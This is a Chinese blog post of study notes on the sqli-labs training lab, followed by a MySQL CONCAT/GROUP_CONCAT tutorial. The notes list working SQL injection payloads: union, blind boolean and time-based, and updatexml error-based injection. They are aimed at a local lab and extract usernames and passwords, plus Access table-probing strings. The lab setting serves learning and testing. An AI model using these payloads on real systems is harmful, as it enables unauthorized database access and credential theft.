安全笔记
安全笔记
XRSec
发布于 2022-02-13 17:04:26
发布于 2022-02-13 17:04:26
代码可运行
运行总次数:0
代码可运行
查库:
select schema_name from information_schema.schemata查表:
select table_name from information_schema.tables where table_schema='security'查列:
select column_name from information_schema.columns where table_name='users'查字段:
select username,password from security.userssqli-lib实践
less-01:
SELECT * FROM users WHERE id='1' LIMIT 0,1;
select SELECT
limit 0,1; 其中第一位是从第几个开始,比如0代表从第一个开始,而第二位的1代表的就是显示多少个数据。
SELECT * FROM users WHERE id='1' or 1=1-- ' LIMIT 0,1
--+ -- #
or and
A and B True
A or B True True
id=1
SELECT * FROM users WHERE id='1''
less-01
数据中存在3列。
system_user()
user()
current_user()
database()
version()
@@datadir
@@version_compile_os
group_concat()
concat_ws('~',A,B)
A~B
information_schema,challenges,mysql,performance_schema,security,test
security
emails,referers,uagents,users
id,username,password
group_concat(concat_ws(0x7e,username,password)) from security.users
concat_ws(0x7e,username,password) # admin~password,admin1~pass,
'1'
1
('1')
select ascii(substr((select database()),1,1));
select database() security
select ascii(substr(security),1,1));
select ascii('s')
115
burpsuite 使用: 代理
security
crow_1
if length(select database()) =8;
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = 0x7365637572697479 limit 1,1),1,1))> 10--+
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+
http://127.0.0.1/sqli/Less-5/?id=1’ and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >1000--+
ascii(substr((select database()),1,1))> 156
security
二分法
1,156
100
http://127.0.0.1/sqli/Less-5/?id=1'
and
ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) > 10
99
--+
select if()
select database()
substr((select database()),1,1)
ascii(substr((select database()),1,1))
select if(ascii(substr((select database()),1,1)) > 10, 2,3);
sqli-labs less01-less10
mysql 查询语句:
查库: select schema_name from information_schema.schemata;
查表: select table_name from information_schema.tables where table_schema='security';
查列: select column_name from information_schema.columns where table_name='users';
查字段: select username,password from security.users;
less-11
select 1=1 and 1=2;
select 1=1 or 1=2;
uname=n' union select 1, schema_name from information_schema.schemata limit 1,1#&passwd=admin&submit=Submit
uname=n' union select 1, group_concat(schema_name) from information_schema.schemata #&passwd=admin&submit=Submit
security
uname=n' union select 1, group_concat(table_name) from information_schema.tables where table_schema='security' #&passwd=admin&submit=Submit
总结:
less-1 get
less-11 post
(1)
'
')
'))
"
")
"))
select * from users where user_id = '1';
select * from users where user_id = '1111 ' or 1=1 #
select database();
group_concat(concat(0x7e,username,password)) from security.users
~
username~password
less-13
select length(database());
if()
长度:if(length(database())>1,1,sleep(5)); 数据库字符长度是8
left(database(),1)='a'
uname=ain') or left((select schema_name from information_schema.schemata limit 0,1),1)>'a' #&passwd=admin&submit=Submit
inf
A-Z
0_9
_
less-14
uname=admin " or length(database())='8'#&passwd=admin&submit=Submit
A or B
A and B
uname=ain" or left((select schema_name from information_schema.schemata limit 0,1),1)='u' #&passwd=admin&submit=Submit
uname=adin " or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)>'a'#&passwd=admin&submit=Submit
uname=adin " or left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='a'#&passwd=admin&submit=Submit
less-15
uname=admin&passwd=a' or length(database())='8'#&submit=Submit
less-16
13 ('ain')
14 "admin"
15 'ain'
16 ("admin")
uname=admin&passwd=admin") and 1=2#&submit=Submit
less-17
uname=admin&passwd=afafa'#&submit=Submit
select updatexml(1,concat(0x7e,(database())),1);
select updatexml(1,concat(0x7e,(构造语句)),1);
查库: select schema_name from information_schema.schemata;
查表: select table_name from information_schema.tables where table_schema='security';
查列: select column_name from information_schema.columns where table_name='users';
查字段: select username,password from security.users;
and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1)
and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),1)
less-18
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('Mn.0', '127.0.0.1', 'admin')
' or updatexml(1,concat(0x7e,()),1);
select updatexml(1,concat(0x7e,(database())),1);
' or updatexml(1,concat(0x7e,(database())),1) or '1'='1
' or updatexml(1,concat(0x7e,(database())),1), '','')#
' or updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1), '','')#
' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),1), '','')#
' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1)),1), '','')#
' or updatexml(1,concat(0x7e,(select username from security.users limit 0,1)),1), '','')# 16进制
0x + Hex Encode 手工注入
2%'and(select count(*)from mssysaccessobjects)>0 and '%'=' //返回正常,access數據庫
2%'and(select count(*)from admin_user)>0 and '%'=' //返回正常,存在admin_user表
2%'and(select count(username)from admin_user)>0 and '%'=' //返回正常,存在username字段
2%'and(select count(password)from admin_user)>0 and '%'=' //返回正常,存在password字段
2%'and(select top 1 len(admin)from admin_user)>4 and '%'=' //返回正常,username長度大於4Mysql中concat()、concat_ws()和 group_concat()的用法
一、CONCAT()函数
CONCAT()函数用于将多个字符串连接成一个字符串。
使用数据表Info作为示例,其中SELECT id,name FROM info LIMIT 1;的返回结果为
+----+--------+
| id | name |
+----+--------+
| 1 | BioCyc |
+----+--------+1、语法及使用特点:
CONCAT(str1,str2,…)返回结果为连接参数产生的字符串。如有任何一个参数为NULL ,则返回值为 NULL。可以有一个或多个参数。
2、使用示例:
SELECT CONCAT(id, ‘,’, name) AS con FROM info LIMIT 1; $ 返回结果为
+----------+
| con |
+----------+
| 1,BioCyc |
+----------+SELECT CONCAT(‘My’, NULL, ‘QL’); # 返回结果为
+--------------------------+
| CONCAT('My', NULL, 'QL') |
+--------------------------+
| NULL |
+--------------------------+3、如何指定参数之间的分隔符
使用函数
CONCAT_WS()。使用语法为:CONCAT_WS(separator,str1,str2,…)CONCAT_WS()代表CONCAT With Separator,是CONCAT()的特殊形式。第一个参数是其它参数的分隔符。分隔符的位置放在要连接的两个字符串之间。分隔符可以是一个字符串,也可以是其它参数。如果分隔符为NULL,则结果为NULL。函数会忽略任何分隔符参数后的NULL值。但是CONCAT_WS()不会忽略任何空字符串。 (然而会忽略所有的NULL)。
如SELECT CONCAT_WS('_',id,name) AS con_ws FROM info LIMIT 1;返回结果为
+----------+
| con_ws |
+----------+
| 1_BioCyc |
+----------+
SELECT CONCAT_WS(',','First name',NULL,'Last Name');返回结果为
+----------------------------------------------+
| CONCAT_WS(',','First name',NULL,'Last Name') |
+----------------------------------------------+
| First name,Last Name |
+----------------------------------------------+二、GROUP_CONCAT()函数
GROUP_CONCAT函数返回一个字符串结果,该结果由分组中的值连接组合而成。 使用表info作为示例,其中语句
SELECT locus,id,journal FROM info WHERE locus IN('AB086827','AF040764');的返回结果为
+----------+----+--------------------------+
| locus | id | journal |
+----------+----+--------------------------+
| AB086827 | 1 | Unpublished |
| AB086827 | 2 | Submitted (20-JUN-2002) |
| AF040764 | 23 | Unpublished |
| AF040764 | 24 | Submitted (31-DEC-1997) |
+----------+----+--------------------------+1、使用语法及特点:
GROUP_CONCAT([DISTINCT] expr [,expr ...]
[ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC] [,col ...]]
[SEPARATOR str_val])在
MySQL中,你可以得到表达式结合体的连结值。通过使用DISTINCT可以排除重复值。如果希望对结果中的值进行排序,可以使用ORDER BY子句。SEPARATOR是一个字符串值,它被用于插入到结果值中。缺省为一个逗号 (","),可以通过指定SEPARATOR ""完全地移除这个分隔符。 可以通过变量group_concat_max_len设置一个最大的长度。在运行时执行的句法如下:SET [SESSION | GLOBAL] group_concat_max_len = unsigned_integer;如果最大长度被设置,结果值被剪切到这个最大长度。如果分组的字符过长,可以对系统参数进行设置:SET @@global.group_concat_max_len=40000;
2、使用示例:
语句 SELECT locus,GROUP_CONCAT(id) FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus; 的返回结果为
+----------+------------------+
| locus | GROUP_CONCAT(id) |
+----------+------------------+
| AB086827 | 1,2 |
| AF040764 | 23,24 |
+----------+------------------+语句 SELECT locus,GROUP_CONCAT(distinct id ORDER BY id DESC SEPARATOR '_') FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus;的返回结果为
+----------+----------------------------------------------------------+
| locus | GROUP_CONCAT(distinct id ORDER BY id DESC SEPARATOR '_') |
+----------+----------------------------------------------------------+
| AB086827 | 2_1 |
| AF040764 | 24_23 |
+----------+----------------------------------------------------------+语句SELECT locus,GROUP_CONCAT(concat_ws(', ',id,journal) ORDER BY id DESC SEPARATOR '. ') FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus;的返回结果为
+----------+--------------------------------------------------------------------------+
| locus | GROUP_CONCAT(concat_ws(', ',id,journal) ORDER BY id DESC SEPARATOR '. ') |
+----------+--------------------------------------------------------------------------+
| AB086827 | 2, Submitted (20-JUN-2002). 1, Unpublished |
| AF040764 | 24, Submitted (31-DEC-1997) . 23, Unpublished |
+----------+--------------------------------------------------------------------------本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021-02-25,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
